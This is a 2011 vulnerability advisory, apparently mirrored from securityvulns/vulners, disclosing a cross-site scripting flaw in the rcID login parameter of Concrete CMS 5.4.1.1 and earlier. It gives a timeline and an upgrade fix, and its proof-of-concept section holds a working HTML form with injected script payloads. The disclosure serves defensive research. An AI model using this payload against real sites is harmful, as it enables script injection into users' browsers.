Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26897
HistoryAug 27, 2011 - 12:00 a.m.

Concrete CMS 5.4.1.1 <= Cross Site Scripting

2011-08-2700:00:00
vulners.com
24

Concrete CMS 5.4.1.1 <= Cross Site Scripting

  1. OVERVIEW

Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting.

  1. BACKGROUND

Concrete5 makes running a website easy. Go to any page in your site,
and a editing toolbar gives you all the controls you need to update
your website. No intimidating manuals, no complicated administration
interfaces - just point and click.

  1. VULNERABILITY DESCRIPTION

The rcID parameter is not properly sanitized, which allows attacker to
conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.

  1. VERSIONS AFFECTED

CMS 5.4.1.1 <=

  1. PROOF-OF-CONCEPT/EXPLOIT

vulnerable parameter: rcID

<form action="http://[target]/Concrete/index.php/login/do_login/"
method="post">
<input type="hidden" name="uName" value="test" />
<input type="hidden" name="uPassword" value="test" />
<input type="hidden" name="rcID" value='"
style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/));
onmouseover="alert(/XSS/)' />
<input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" />
</form>

  1. SOLUTION

Upgrade to 5.4.2 or higher.

  1. VENDOR

Concrete CMS Developers
http://www.concrete5.org/

  1. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

  1. DISCLOSURE TIME-LINE

2011-04-14: vulnerability reported
2011-08-04: vendor released fixed version
2011-08-23: vulnerability disclosed

  1. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting
Project Home: http://www.concrete5.org/
Vendor Release Note:
http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/

#yehg [2011-08-23]